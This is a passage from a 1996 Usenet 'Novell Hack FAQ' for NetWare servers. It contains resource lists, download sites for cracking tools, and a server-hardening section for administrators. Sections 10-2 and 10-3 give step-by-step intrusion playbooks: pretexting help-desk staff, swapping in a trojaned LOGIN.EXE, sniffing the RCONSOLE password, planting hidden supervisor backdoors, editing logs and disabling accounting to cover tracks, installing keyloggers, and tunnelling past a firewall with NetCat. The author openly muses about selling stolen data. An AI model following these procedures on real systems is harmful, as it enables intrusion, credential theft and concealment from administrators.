  2202. http://www.efs.mq.edu.au/novell/faq                     comp.sys.novell FAQ
  2203. http://occam.sjf.novell.com:8080                        Online manuals
  2204. http://www.safe.net/safety                              Security Company
  2205. http://www.cis.ohio-state.edu/hypertext/faq/usenet/netware/security/faq.html
  2206.                            comp.os.netware.security FAQ
  2207.  
  2208. * Excellent site for tons of techie info. The Netware Server Management 
  2209. section should be read be all hackers and admins alike.
  2210.  
  2211. ** BioHazard has been busy collecting tools, a great site with assorted
  2212. nasties like keystroke capture programs, sniffers, and other security
  2213. compromising goodies. The bane of Sys Admins everywhere.
  2214.  
  2215. ---------------------------------------------------------------------------
  2216.  
  2217. 08-4. What are some Netware USENET groups?
  2218.  
  2219. Netware specific:
  2220.  
  2221.     comp.os.netware.misc (main group, replaced comp.sys.novell)
  2222.     comp.os.netware.announce (moderated announcements)
  2223.     comp.os.netware.security (security issues)
  2224.     comp.os.netware.connectivity (connect. issues incl. LAN Workplace)
  2225.  
  2226. Security, H/P in general:
  2227.  
  2228.     alt.2600
  2229.     alt.security
  2230.     comp.security.announce
  2231.     comp.security.misc
  2232.  
  2233. ---------------------------------------------------------------------------
  2234.  
  2235. 08-5. What are some Netware mailing lists?
  2236.  
  2237. *  NOVELL@listserv.syr.edu - send an email with no subject to
  2238. listserv@listserv.syr.edu with "subscribe NOVELL Your Full Name" in the body.
  2239. You must reply to the message within two days or you'll not be added to the
  2240. list. The same address no subject with "unsubscribe NOVELL" takes you off the
  2241. list.
  2242.  
  2243. *  BIG-LAN@suvm.acs.syr.edu - send subscriptions to LISTSERV@suvm.acs.syr.edu.
  2244.  
  2245. *  CUTCP-L@nstn.ns.ca for a discussion of Charon and CUTCP Telnet issues. Send
  2246. subscription requests to listserv@nstn.ns.ca.
  2247.  
  2248. *  INFO-IBMPC@arl.army.mil - send subscription requests to 
  2249. INFO-IBMPC-REQUEST@arl.army.mil.
  2250.  
  2251. *  PMAIL@ua1vm.ua.edu for discussion of Pegasus Mail. The author, David Harris,
  2252. is active on this list. Send subscription and other administrative requests to
  2253. listserv@ua1vm.ua.edu.
  2254.  
  2255. *  NWP@UEL.AC.UK for programming under Netware. Send subscription requests to
  2256. LISTPROC@UEL.AC.UK.
  2257.  
  2258. *  MSDOS-ANN@tacom-emh1.army.mil for announcements of SimTel uploads. To
  2259. subscribe, send mail to LISTSERV@tacom-emh1.army.mil with the message
  2260. SUBSCRIBE MSDOS-ANN.
  2261.  
  2262. *  Garbo-Ann@Garbo.uwasa.fi for announcements of Garbo uploads. To subscribe,
  2263. send mail to Majordomo@Garbo.uwasa.fi with the message SUBSCRIBE GARBO-ANN
  2264. <firstname> <lastname>.
  2265.  
  2266. *  CICA-L@ubvm.cc.buffalo.edu for announcements of Windows uploads to CICA. To
  2267. subscribe, send mail to Listserv@ubvm.cc.buffalo.edu with the message SUBSCRIBE
  2268. CICA-L <firstname> <lastname>.
  2269.  
  2270. ---------------------------------------------------------------------------
  2271.  
  2272. 08-6. Where are some other Netware FAQs?
  2273.  
  2274. The old comp.sys.novell (recently deleted) FAQ is available via ftp at 
  2275. ftp.eskimo.com in directory /u/m/mstal. The c.s.n FAQ is csn.faq. The Novell 
  2276. listserv FAQ is faq.txt.  It can be FTP directly from its maintainer at 
  2277. netlab2.usu.edu/misc/faq.txt.
  2278.  
  2279. These are also available at URL http://www.eskimo.com/~mstal. Included is a 
  2280. URL to ftp the latest version of the Novell listserv FAQ, a URL to a web of 
  2281. the Novell listserv FAQ with many of the ftp sites webbed, and a URL to a 
  2282. web of the c.s.n faq, created by David Rawling. The Novell listserv FAQ web 
  2283. URL is http://www.salford.ac.uk/docs/depts/ais/Network/Novell-Faq.html 
  2284. and the c.s.n FAQ web URL is http://www.efs.mq.edu.au/novell/faq/index.html.
  2285.  
  2286. Stanley Toney publishes a bi-weekly Netware Patches and Updates FAQ in 
  2287. comp.os.netware.announce. It is also available at 
  2288. ftp://ftp.nsm.smcm.edu/pub/novell/patchfaq.zip. 
  2289.  
  2290. Floyd Maxwell, fmaxwell@unixg.ubc.ca, keeper of the listserv FAQ, will 
  2291. automatically mail you the FAQ on a regular basis if you request it of him.
  2292.  
  2293. Fauzan Mirza has developed a FAQ for comp.os.netware.security, posting it 
  2294. there once a month. It is also archive at rtfm.mit.edu in the usenet FAQ 
  2295. archive.
  2296.  
  2297. Don't forget the alt.2600/#hack FAQ as a general hacking/phreaking
  2298. resource, available at rtfm.mit.edu among other locations.
  2299.  
  2300. ---------------------------------------------------------------------------
  2301.  
  2302. 08-7. Where can I get the files mentioned in this FAQ?
  2303.  
  2304. SETPWD.NLM   - ml0.ucs.ed.ac.uk    /guest/pc/novell/nlms   setpwd.zip 
  2305. SETSPWD.NLM  - netlab2.usu.edu     /misc 
  2306. SETSPASS.NLM - netlab2.usu.edu     /misc
  2307. NOVELBFH.EXE - jumper.mcc.ac.uk    /pub/security/netware novelbfh.zip
  2308. KNOCK.EXE    - jumper.mcc.ac.uk    /pub/security/netware    knock.zip
  2309. LOGIN.EXE    - jumper.mcc.ac.uk    /pub/security/netware      nwl.zip
  2310. PROP.EXE     - jumper.mcc.ac.uk    /pub/security/netware      nwl.zip
  2311. CHKNULL.EXE  - ftp.fastlane.net    /pub/nomad/nw             chk0.zip
  2312. USERLST.EXE  - ml0.ucs.ed.ac.uk    /guest/pc/novell/utils jrb212a.zip
  2313. LASTHOPE.NLM - ml0.ucs.ed.ac.uk    /guest/pc/novell/nlms lasthope.zip
  2314. NW-HACK.EXE  - jumper.mcc.ac.uk    /pub/security/netware  nw-hack.zip
  2315. SUPER.EXE    - ml0.ucs.ed.ac.uk    /guest/pc/novell/utils   super.zip
  2316. CONLOG.NLM   - ml0.ucs.ed.ac.uk    /guest/pc/novell
  2317. X-AWAY.EXE   - ml0.ucs.ed.ac.uk    /guest/pc/novell/utils  x-away.zip
  2318. GRPLIST.EXE  - ml0.ucs.ed.ac.uk    /guest/pc/novell/utils jrb212a.zip
  2319. GETEQUIV.EXE - ml0.ucs.ed.ac.uk    /guest/pc/novell/utils jrb212a.zip
  2320. TRSTLIST.EXE - ml0.ucs.ed.ac.uk    /guest/pc/novell/utils jrb212a.zip
  2321. SECUREFX.NLM - www.novell.com      Search for it in the Tech Section
  2322. RCON.EXE     - onyx.infonexus.com  /pub/ToolsOfTheTrade/Netware
  2323.                                  rcon.zip
  2324. SMARTPASS    - ftp.efs.mq.edu.au   /pub/novell             smrtpw.zip
  2325. BINDERY.EXE  - onyx.infonexus.com  /pub/ToolsOfTheTrade/Netware
  2326.                               bindery.zip
  2327.  
  2328. Duplicates of some of these files exist at my site, ftp.fastlane.net, and 
  2329. at onyx.infonexus.com.
  2330.  
  2331.  
  2332. ---------------------------------------------------------------------------
  2333.  
  2334. 08-8. What are some good books for Netware?
  2335.  
  2336. For Netware basics, there are tons. Bill Lawrence has a number of books
  2337. that are easy to read but cover things with enough detail for a good
  2338. understanding. I recommend the latest stuff from him. Look in your local
  2339. bookstore's techie section. The Novell Press books are also good, but you
  2340. tend to pay more for the name.
  2341.  
  2342. For programming:
  2343.  
  2344. Programmer's Guide to Netware -- (1990) Author: Charles G. Rose. Publisher:
  2345. McGraw-Hill, Inc. The bible of Netware programming, dated since Novell has 
  2346. changed virtually every header file, but still the best. Covers 2.x and 3.x
  2347. except for NLM programming. Lots of good source code.
  2348.  
  2349. Netware Programmer's Guide -- (1990) Author: John T. McCann. Publisher: M&T
  2350. Books. Another dated but classic book with lots of good source for learning.
  2351.  
  2352. Novell 4.0 NLM Programming -- (1993) Authors: Michael Day, Michael Koontz,
  2353. Daniel Marshall. Publisher: Sybex, Inc. Not as complete as I would like, but
  2354. I'm picky. Still a classic. Although the title implies 4.x, most of it still
  2355. works for 3.x, too. And if you can't get the kids to sleep, try reading them 
  2356. the tons of useful source code. Jeez, you may have to leave the closet light
  2357. on, though...
  2358.  
  2359. ---------------------------------------------------------------------------
  2360.  
  2361.  
  2362. - Simple Nomad - Data Wanderer, Knowledge Hunter/Gatherer
  2363. -    E-Mail    - thegnome@fastlane.net - thegnome@spyder.org
  2364. -              - thegnome@onyx.infonexus.com
  2365. -      URL     - http://www.fastlane.net/homepages/thegnome
  2366. -    Secrets   - Get "new" PGP key via my home page
  2367.  
  2368. From netcom.com!ix.netcom.com!howland.reston.ans.net!nntp.coast.net!zombie.ncsc.mil!news.mathworks.com!newsfeed.internetmci.com!in2.uu.net!news.nkn.net!news Fri Mar  8 08:39:29 1996
  2369. Xref: netcom.com alt.2600:178186 comp.os.netware.security:3210 comp.security.misc:27786
  2370. Path: netcom.com!ix.netcom.com!howland.reston.ans.net!nntp.coast.net!zombie.ncsc.mil!news.mathworks.com!newsfeed.internetmci.com!in2.uu.net!news.nkn.net!news
  2371. From: thegnome@fastlane.net (Simple Nomad)
  2372. Newsgroups: alt.2600,comp.os.netware.security,comp.security.misc
  2373. Subject: Novell Hack FAQ -- Part 11 of 12
  2374. Date: 8 Mar 1996 04:51:23 GMT
  2375. Organization: Nomad Mobile Research Centre
  2376. Lines: 62
  2377. Message-ID: <4hoecb$ih0@news2.nkn.net>
  2378. NNTP-Posting-Host: fw47.fastlane.net
  2379. X-Newsreader: WinVN 0.92.6+
  2380.  
  2381. ---------------------------------------------------------------------------
  2382.  
  2383. Section 09
  2384.  
  2385. Netware APIs
  2386.  
  2387. ---------------------------------------------------------------------------
  2388.  
  2389. 09-1. Where can I get the Netware APIs?
  2390.  
  2391. Stateside call 1-800-RED-WORD, it's $50 USD, and includes a 2-user license
  2392. of Netware 4.1. Most brand-name compilers will work, but if you're writing
  2393. NLMs you'll need Watcom's latest. It's the only one I know of that will do
  2394. NLM linking.
  2395.  
  2396. ---------------------------------------------------------------------------
  2397.  
  2398. 09-2. Are there alternatives to Netware's APIs?
  2399.  
  2400. There are three that I am aware of. Here is info on them -
  2401.  
  2402. Visual ManageWare by HiTecSoft (602) 970-1025
  2403.  
  2404. This product allows development of NLMs and DOS EXEs using a Visual Basic
  2405. type development environment. Runtime royalty-free development without
  2406. C/C++ and without Watcom. However links are included for C/C++ programs.
  2407. The full SDK including compilers is USD$895.00. Pricey but looks good, I
  2408. have not used this product.
  2409.  
  2410. Here is Teiwaz' edited report on the other -
  2411.  
  2412. [quote]
  2413. Here is another source for 'c' libs for Netware.  He sells both DOS / Windows 
  2414. style libs.  The Small memory model size for DOS, a bit of source is free.  
  2415.  
  2416. FTP
  2417. oak.oakland.edu/SimTel/msdos/c/netclb30.zip
  2418. Public Domain Small Mem Model Lib
  2419.  
  2420. Author
  2421. Adrian Cunnelly - adrian@amcsoft.demon.co.uk
  2422.  
  2423. Price
  2424. the current price in US Dollars is:
  2425.  
  2426. 38  Dollars - All model libraries + windows DLL
  2427. 110 Dollars - Above + Source Code
  2428. [endquote]
  2429.  
  2430. And take a look at Greg Miller's site, especially for those Pascal coders
  2431. out there:
  2432.  
  2433.         http://www.ius.indiana.edu/~gmiller/
  2434.  
  2435. ---------------------------------------------------------------------------
  2436.  
  2437.  
  2438. - Simple Nomad - Data Wanderer, Knowledge Hunter/Gatherer
  2439. -    E-Mail    - thegnome@fastlane.net - thegnome@spyder.org
  2440. -              - thegnome@onyx.infonexus.com
  2441. -      URL     - http://www.fastlane.net/homepages/thegnome
  2442. -    Secrets   - Get "new" PGP key via my home page
  2443.  
  2444. From netcom.com!ix.netcom.com!howland.reston.ans.net!newsfeed.internetmci.com!in1.uu.net!news.nkn.net!news Fri Mar  8 08:39:29 1996
  2445. Xref: netcom.com alt.2600:178188 comp.os.netware.security:3211 comp.security.misc:27788
  2446. Path: netcom.com!ix.netcom.com!howland.reston.ans.net!newsfeed.internetmci.com!in1.uu.net!news.nkn.net!news
  2447. From: thegnome@fastlane.net (Simple Nomad)
  2448. Newsgroups: alt.2600,comp.os.netware.security,comp.security.misc
  2449. Subject: Novell Hack FAQ -- Part 12 of 12
  2450. Date: 8 Mar 1996 04:58:26 GMT
  2451. Organization: Nomad Mobile Research Centre
  2452. Lines: 406
  2453. Message-ID: <4hoepi$ih0@news2.nkn.net>
  2454. NNTP-Posting-Host: fw47.fastlane.net
  2455. X-Newsreader: WinVN 0.92.6+
  2456.  
  2457. ---------------------------------------------------------------------------
  2458.  
  2459. Section 10
  2460.  
  2461. For Administrators Only
  2462.  
  2463. ---------------------------------------------------------------------------
  2464.  
  2465. 10-1. How do I secure my server?
  2466.  
  2467. This question is asked by administrators, and I'm sure no hackers will read
  2468. this info and learn what you admins might do to thwart hack attacks ;-)
  2469.  
  2470. One thing to keep in mind, most compromises of data occur from an employee
  2471. of the company, not an outside element. They may wish to access sensitive
  2472. personnel files, copy and sell company secrets, be disgruntled and wish to
  2473. cause harm, or break in for kicks or bragging rights. So trust no one.
  2474.  
  2475. Physically Secure The Server -
  2476. ------------------------------
  2477.  
  2478. This is the simplest one. Keep the server under lock and key. If the server
  2479. is at a site where there is a data center (mainframes, midranges, etc) put it
  2480. in the same room and treat it like the big boxes. Access to the server's room
  2481. should be controlled minimally by key access, preferably by some type of key
  2482. card access which can be tracked. In large shops, a man trap (humanoid that
  2483. guards the room) should be in place.
  2484.  
  2485. If the server has a door with a lock, lock it (some larger servers have this)
  2486. and limit access to the key. This will secure the floppy drive. One paranoid
  2487. site I know of keeps the monitor and CPU behind glass, so that the keyboard
  2488. and floppy drive cannot be accessed by the same person at the same time.
  2489.  
  2490. If you only load NLMs from the SYS:SYSTEM directory, use the SECURE CONSOLE
  2491. command to prevent NLMs being loaded from the floppy or other location.
  2492.  
  2493. A hacker could load a floppy into the drive and run one of several utility
  2494. files to gain access to the server. Or they could steal a backup tape or just
  2495. power off the server! By physically securing the server, you can control who
  2496. has access to the server room, who has access to the floppy drive, backup
  2497. tapes, and the System Console. This step alone will eliminate 75% of attack
  2498. potential.
  2499.  
  2500. Secure Important Files -
  2501. ------------------------
  2502.  
  2503. These should be stored offline. You should make copies of the STARTUP.NCF and
  2504. AUTOEXEC.NCF files. The bindery or NDS files should be backed up and stored
  2505. offsite. All System Login Scripts, Container Scripts, and any robotic or
  2506. non-human personal Login Scripts should be copied offline. A robotic or
  2507. non-human account would be an account used by an email gateway, backup
  2508. machine, etc.
  2509.  
  2510. Compile a list of NLMs and their version numbers, and a list of files from
  2511. the SYS:LOGIN, SYS:PUBLIC, and SYS:SYSTEM directories.
  2512.  
  2513. You should periodically check these files against the originals to ensure
  2514. none have been altered.
  2515.  
  2516. Replacing the files with different ones (like using itsme's LOGIN.EXE
  2517. instead of Novell's) will give the hacker access to the entire server. It is
  2518. also possible that the hacker will alter .NCF or Login Scripts to bypass
  2519. security or to open holes for later attacks.
  2520.  
  2521. Make a list of Users and their accesses -
  2522. -----------------------------------------
  2523.  
  2524. Use a tool like Bindview or GRPLIST.EXE from the JRB Utilities to get a list
  2525. of users and groups (including group membership). Once again, keep this
  2526. updated and check it frequently against the actual list.
  2527.  
  2528. Also run Security (from the SYS:SYSTEM directory) or GETEQUIV.EXE from the
  2529. JRB Utilities to determine who has Supervisor access. Look for odd accounts
  2530. with Supervisor access like GUEST or PRINTER.
  2531.  
  2532. It is also a good idea to look at Trustee Assignments and make sure access is
  2533. at a minimum. Check your run from Security to see if access is too great in
  2534. any areas, or run TRSTLIST from the JRB Utilities.
  2535.  
  2536. Security will turn up some odd errors if SUPER.EXE has been run. If you are
  2537. not using SUPER.EXE, delete and rebuild any odd accounts with odd errors
  2538. related to the Bindery, particularly if BINDFIX doesn't fix them yet the
  2539. account seems to work okay. If a hacker put in a backdoor using SUPER.EXE,
  2540. they could get in and perhaps leave other ways in.
  2541.  
  2542. Monitor the Console -
  2543. ---------------------
  2544.  
  2545. Use the CONLOG.NLM to track the server console activity. This is an excellent
  2546. diagnostic tool since error messages tend to roll off the screen. It will
  2547. not track what was typed in at the console, but the system's responses will
  2548. be put in SYS:ETC\CONSOLE.LOG. When checking the console, hit the up arrow
  2549. to show what commands were last typed in.
  2550.  
  2551. While this won't work in large shops or shops with forgetful users, consider
  2552. using the SECUREFX.NLM (or SECUREFX.VAP for 2.x). This sometimes annoying
  2553. utility displays the following message on the console and to all the users
  2554. after a security breach:
  2555.  
  2556. "Security breach against station <connection number> DETECTED."
  2557.  
  2558. This will also be written to an error log. The following message is also
  2559. written the the log and to the console:
  2560.  
  2561. "Connection TERMINATED to prevent security compromise"
  2562.  
  2563. Turn on Accounting -
  2564. --------------------
  2565.  
  2566. Once Accounting is turned on, you can track every login and logout to the
  2567. server, including failed attempts.
  2568.  
  2569. Don't Use the Supervisor Account -
  2570. ----------------------------------
  2571.  
  2572. Leaving the Supervisor logged in is an invitation to disaster. If packet
  2573. signature is not being used, someone could use HACK.EXE and gain access to the
  2574. server as Supervisor. HACK spoofs packets to make them look like they came 
  2575. from the Supervisor to add Supe equivalence to other users.
  2576.  
  2577. Also, it implies a machine is logged in somewhere as Supervisor, if it has 
  2578. been logged in for more than 8 hours chances are it may be unattended.
  2579.  
  2580. Use Packet Signature -
  2581. ----------------------
  2582.  
  2583. To prevent packet spoofing (i.e. HACK.EXE) enforce packet signature. Add the
  2584. following line to your AUTOEXEC.NCF -
  2585.  
  2586. SET NCP PACKET SIGNATURE OPTION=3
  2587.  
  2588. This forces packet signature to be used. Clients that do not support packet
  2589. signature will not be able to access, so they will need to be upgraded if you
  2590. have any of these clients.
  2591.  
  2592. Use RCONSOLE Sparingly (or not at all) -
  2593. ----------------------------------------
  2594.  
  2595. When using RCONSOLE you are subject to a packet sniffer getting the packets
  2596. and getting the password. While this is normally above the average user's
  2597. expertise, DOS-based programs that put the network interface card into 
  2598. promiscuous mode and capture every packet on the wire are readily available
  2599. on the Internet. The encryption method is not foolproof.
  2600.  
  2601. Remember you cannot "detect" a sniffer in use on the wire.
  2602.  
  2603. Do NOT use a switch to limit the RCONSOLE password to just the Supervisor
  2604. password. All you have done is set the password equal to the switch. If
  2605. you use the line "LOAD REMOTE /P=", Supervisor's password will get in (it
  2606. ALWAYS does) and the RCONSOLE password is now "/P=". Since the RCONSOLE
  2607. password will be in plain text in the AUTOEXEC.NCF file, to help secure
  2608. it try adding a non-printing character or a space to the end of the 
  2609. password.
  2610.  
  2611. And while you can use the encryption techniques outlined in 02-8, your
  2612. server is still vulnerable to sniffing the password.
  2613.  
  2614. Move all .NCF files to a more secure location (3.x and above) -
  2615. ---------------------------------------------------------------
  2616.  
  2617. Put your AUTOEXEC.NCF file in the same location as the SERVER.EXE file. If a
  2618. server is compromised in that access to the SYS:SYSTEM directory is available
  2619. to an unauthorized user, you will at least have protected the AUTOEXEC.NCF
  2620. file. 
  2621.  
  2622. A simple trick you can do is "bait" a potential hacker by keeping a false
  2623. AUTOEXEC.NCF file in the SYS:SYSTEM with a false RCONSOLE password (among
  2624. other things). 
  2625.  
  2626. All other .NCF files should be moved to the C: drive as well. Remember, the
  2627. .NCF file runs as if the commands it contains are typed from the console,
  2628. making their security most important.
  2629.  
  2630. Use the Lock File Server Console option in Monitor (3.x and above) -
  2631. --------------------------------------------------------------------
  2632.  
  2633. Even if the RCONSOLE password is discovered, the Supe password is discovered,
  2634. or physical access is gained, a hard to guess password on the console will
  2635. stop someone from accessing the console.
  2636.  
  2637. Add EXIT to the end of the System Login Script -
  2638. ------------------------------------------------
  2639.  
  2640. By adding the EXIT command as the last line in the System Login Script,
  2641. you can control to a degree what the user is doing. This eliminates the
  2642. potential for personal Login Script attacks, as described in section 03-6.
  2643.  
  2644. Upgrade to Netware 4.1 -
  2645. ------------------------
  2646.  
  2647. Besides making a ton of Novell sales and marketing people very happy, you
  2648. will defeat most of the techniques described in this faq. Most well-known
  2649. hacks are for 3.11. If you don't want to make the leap to NDS and 4.1, at
  2650. least get current and go to 3.12.
  2651.  
  2652. Check the location of RCONSOLE.EXE -
  2653. ------------------------------------
  2654.  
  2655. In 3.11, RCONSOLE.EXE is located in SYS:SYSTEM by default. In 3.12 and 4.1
  2656. it is in SYS:SYSTEM and SYS:PUBLIC. You may wish to remove RCONSOLE.EXE from
  2657. SYS:PUBLIC, as by default everyone will have access to it.
  2658.  
  2659. Remove [Public] from [Root] in 4.1's NDS-
  2660. -----------------------------------------
  2661.  
  2662. Get the [Public] Trustee out of the [Root] object's list of Trustees. Anyone,
  2663. even those not logged in, can see virtually all objects in the tree, giving
  2664. an intruder a complete list of valid account names to try.
  2665.  
  2666. ---------------------------------------------------------------------------
  2667.  
  2668. 10-2. I'm an idiot. Exactly how do hackers get in?
  2669.  
  2670. We will use this section as an illustrated example of how these techniques can
  2671. be used in concert to gain Supe access on the target server. These techniques
  2672. show the other thing that really helps in Netware hacking - a little social 
  2673. engineering.
  2674.  
  2675. Exploitation #1
  2676. ---------------
  2677.  
  2678. Assume tech support people are dialing in for after hours support. Call up and 
  2679. pose as a vendor of security products and ask for tech support person. Called 
  2680. this person posing as a local company looking for references, ask about remote 
  2681. dial-in products. Call operator of company and ask for help desk number. Call
  2682. help desk after hours and ask for dial-in number, posing as the tech support 
  2683. person. Explain home machine has crashed and you've lost number.
  2684.  
  2685. Dial in using the proper remote software and try simple logins and passwords for
  2686. dial-in software if required. If you can't get in call help desk especially if
  2687. others such as end users use dial-in.
  2688.  
  2689. Upload alternate LOGIN.EXE and PROP.EXE, and edit AUTOEXEC.BAT to run the 
  2690. alternate LOGIN.EXE locally. Rename PROP.EXE to IBMNBIO.COM and make it hidden. 
  2691. Before editing AUTOEXEC.BAT change the date and time of the PC so that the date/time stamp reflects the original before the edit.
  2692.  
  2693. Dial back in later, rename PROP.EXE and run it to get Accounts and passwords.
  2694.  
  2695. Summary - Any keystroke capture program could produce the same results as the 
  2696. alternate LOGIN.EXE and PROP.EXE, but you end up with a Supe equivalent account.
  2697.  
  2698. Exploitation #2
  2699. ---------------
  2700.  
  2701. Load a DOS-based packet sniffer, call the sys admin and report a FATAL
  2702. DIRECTORY ERROR when trying to access the server. He predictively will use 
  2703. RCONSOLE to look at the server and his packet conversation can be captured. He 
  2704. will find nothing wrong (of course).
  2705.  
  2706. Study the capture and use the RCON.FAQ to obtain the RCONSOLE password. Log in 
  2707. as GUEST, create a SYSTEM subdirectory in the home directory (or any directory 
  2708. on SYS:). Root map a drive to the new SYSTEM, copy RCONSOLE.* to it, and run
  2709. RCONSOLE. Once in try to unload CONLOG and upload BURGLAR.NLM to the real 
  2710. SYS:SYSTEM. Created a Supe user (i.e. NEWUSER) and then typed CLS to clear the 
  2711. server console screen. 
  2712.  
  2713. Log in as NEWUSER. Erase BURGLAR.NLM, new SYSTEM directory and its contents.
  2714. Run PURGE in those directories. Turn off Accounting if on. Give GUEST Supe 
  2715. rights. Set toggle with SUPER.EXE for NEWUSER. Run FILER and note SYS:ETC\CONSOLE.LOG (if CONLOG was loaded) owner and create date, as well as
  2716. SYS:SYSTEM\SYS$ERR.LOG owner and create date. Edit SYS:ETC\CONSOLE.LOG and 
  2717. remove BURGLAR.NLM activity, including RCONSOLE activity. Edit and remove
  2718. RCONSOLE activity from SYS:SYSTEM\SYS$ERR.LOG as well. After saving files,
  2719. run FILER and restore owner and dates if needed. Run PURGE in their directories.
  2720. Logout and login as GUEST and set SUPER.EXE toggle. Remove NEWUSER Supe rights
  2721. and logout. Login as NEWUSER with SUPER.EXE and remove GUEST Supe rights.
  2722. Finally logout and login as GUEST with SUPER.EXE and turn on Accounting if it
  2723. was on. 
  2724.  
  2725. Summary - You have created a backdoor into the system that will not show up as
  2726. somthing unusual in the Accounting log. Login as GUEST using SUPER.EXE and turn 
  2727. off Accounting. Logout and back in as NEWUSER with SUPER.EXE, do what you
  2728. need to do (covering file alterations with Filer), and logout. Log back in as 
  2729. GUEST and turn on Accounting. The NET$ACCT.DAT file shows only GUEST logging in 
  2730. followed by GUEST logging out. 
  2731.  
  2732. ---------------------------------------------------------------------------
  2733.  
  2734. 10-3. I have xxx setup and xxx version running. Am I secure?
  2735.  
  2736. This question has been coming up lately. A lot. Admins asking me if their
  2737. sites are secure. Here is an example from a post to one of the Netware
  2738. newsgroups with my comments, as it is generic enough to apply to a number
  2739. of locations (in other words, no you are not 100% secure):
  2740.  
  2741. >Here is the scenario:  A supervisor of a network suspects that he may
  2742. >be facing termination of employment in the near future.  He is embittered
  2743. >and aggravated.  As system administrator for the network, he oversees
  2744. >the computers that track all business actions.  Basically, he can bring
  2745. >the organization to it's knees in a heartbeat, and he knows it.  He has
  2746. >made comments in passing that it is possible that either time bombs have
  2747. >been set in the system, or that a possible "Dead-man's clutch" may exist
  2748. >(if he's not there to disable some mechanism daily/weekly the system will
  2749. >be compromised).  
  2750.  
  2751. Not nearly as easy to set up in the environment you've specified. However,
  2752. I'd let that rumor continue so as to waste your time looking for a
  2753. dead-man's clutch. In the meantime, I'd be stealing stuff from those
  2754. databases and selling them to the competition.
  2755.  
  2756. >Here is the tech specs: A Novell 3.12 server that serves databases, email
  2757. >and user files to 30 PC's running Windows 3.1.  The network is attached 
  2758. >to the Internet.  No OS's other than DOS/Windows and Novell.  The 
  2759. >network is attached to a larger network that is very accessible to the
  2760. >public (via physically attached machines, and the Internet).  There 
  2761. >are no firewalls.  The supervisor is the only person with supervisor
  2762. >password/privileges on the server, as well as the only person who knows
  2763. >the details of the network, the server disk layout, the server nlm's.
  2764. >Basically the only person who has been inside the server which is such
  2765. >a vitally mission critical system.  
  2766. >
  2767. >Here's what I have so far:
  2768. >        1. quarantine the 30 node network and server by physically
  2769. >           disabling it's Ethernet access to the outside world.
  2770.  
  2771. This is an interesting step. However your problem returns once you
  2772. re-attach.
  2773.  
  2774. >        2. make a full system backup of the server before touching
  2775. >           investigating or touching anything.
  2776.  
  2777. If a problem occurs and you restore your backups, any virii, trojans,
  2778. and other back doors will get back into the system.
  2779.  
  2780. >        3. "secure" the Novell server (see below)
  2781.  
  2782. Read my hack FAQ. ftp://ftp.fastlane.net/pub/nomad/nw/faq.zip
  2783.  
  2784. You see, if I were to leave a backdoor, I would leave several. 
  2785.  
  2786. 1) I would run BINDFIX and then run a bindery cracker on ALL accounts
  2787. on the server against the .OLD bindery files. I would use
  2788. ftp://ftp.fastlane.net/pub/nomad/nw/bindery.zip to do this, along with
  2789. a huge word list. This should not only get me most passwords on the
  2790. system, but get automated passwords as well. For example, Arcserve
  2791. 5.01g installs an account called CHEY_ARCHSVR with station restrictions
  2792. and a password of WONDERLAND. I'd remove the station restrictions and
  2793. either use SUPER.EXE to set up CHEY_ARCHSVR as a toggled Supe account,
  2794. or just make it plain old Supe equivalent. Most people do not check 
  2795. these kinds of accounts.
  2796.  
  2797. 2) I would install the alternate LOGIN.EXE and PROP.EXE to give myself
  2798. a way to see new passwords that have been changed. These files can be
  2799. found at ftp://ftp.fastlane.net/pub/nomad/nw/nwl.zip, details in the
  2800. FAQ.
  2801.  
  2802. 3) I would delete all zero length personal login files (see the FAQ for
  2803. why).
  2804.  
  2805. 4) Any logins (such as the one possibly used by an SMTP gateway) which
  2806. would be normally restricted would be toggled with SUPER.EXE. GUEST
  2807. would be toggled.
  2808.  
  2809. 5) Message files (such as the ones used in displaying error messages)
  2810. would be hacked so that security violations would display harmless
  2811. messages.
  2812.  
  2813. >        4. "secure" all PC's (see below)
  2814.  
  2815. I would install keystroke grabbers on a number of machines, like those
  2816. found at ftp://onyx.infonexus.com/pub/ToolsOfTheTrade/DOS/KeyLoggers/
  2817.  
  2818. >        5. erect a firewall disabling IPX passage into the network
  2819. >           but allowing TCP/IP (email services required).
  2820.  
  2821. I would use some of these "very public" machines and install a sniffer,
  2822. and I would use NetCat to redirect port 25 traffic to a particular
  2823. address to a different machine's telnetd, bypassing the firewall.
  2824. ftp://onyx.infonexus.com/pub/ToolsOfTheTrade/Unix/nc100.tgz for NetCat.
  2825.  
  2826. With the sniffer it could be possible to get the RCONSOLE password.
  2827. See ftp://ftp.fastlane.net/pub/nomad/nw/rcon*.zip for details.
  2828.  
  2829. I would make sure that IP is on my server, and make sure XCONSOLE is
  2830. running. Once past the firewall, I'd telnet to the server's IP
  2831. address and run either X11 or VT100 remote console sessions with the
  2832. server.
  2833.  
  2834. >        6. notify the supervisor that he is fired, and take whatever
  2835. >           actions are necessary to keep him from coming in physical
  2836. >           contact with the network.
  2837.  
  2838. If planned ahead, the supe will have his/her backdoors in place, and this
  2839. will not matter. In fact, s/he will probably MAKE SURE that they do not
  2840. even look at a machine.
  2841.  
  2842. >There's a gotcha,  getting the supervisor password.  It would be
  2843. >ideal to inadvertently get it, but thats a long shot.  The system 
  2844. >administrator will probably have to be asked for it at step 6, whether
  2845. >he gives it to us is IMHO unlikely.  
  2846.  
  2847. The FAQ tells how you can recover from this easily.
  2848.  
  2849. Remember, you've eliminated social engineering from your checklist. I'd
  2850. attach a modem to a PC for PCanyWhere and then call up stating, "I'm the
  2851. vendor your ex-employee hired to dial in and check blah-blah. If I were
  2852. you I'd change my dial-in password." Once in (in the middle of the night)
  2853. I'd activate a backdoor and proceed to make your competitor rich.
  2854.  
  2855. ---------------------------------------------------------------------------
  2856.  
  2857.  
  2858. - Simple Nomad - Data Wanderer, Knowledge Hunter/Gatherer
  2859. -    E-Mail    - thegnome@fastlane.net - thegnome@spyder.org
  2860. -              - thegnome@onyx.infonexus.com
  2861. -      URL     - http://www.fastlane.net/homepages/thegnome
  2862. -    Secrets   - Get "new" PGP key via my home page
  2863.  
  2864.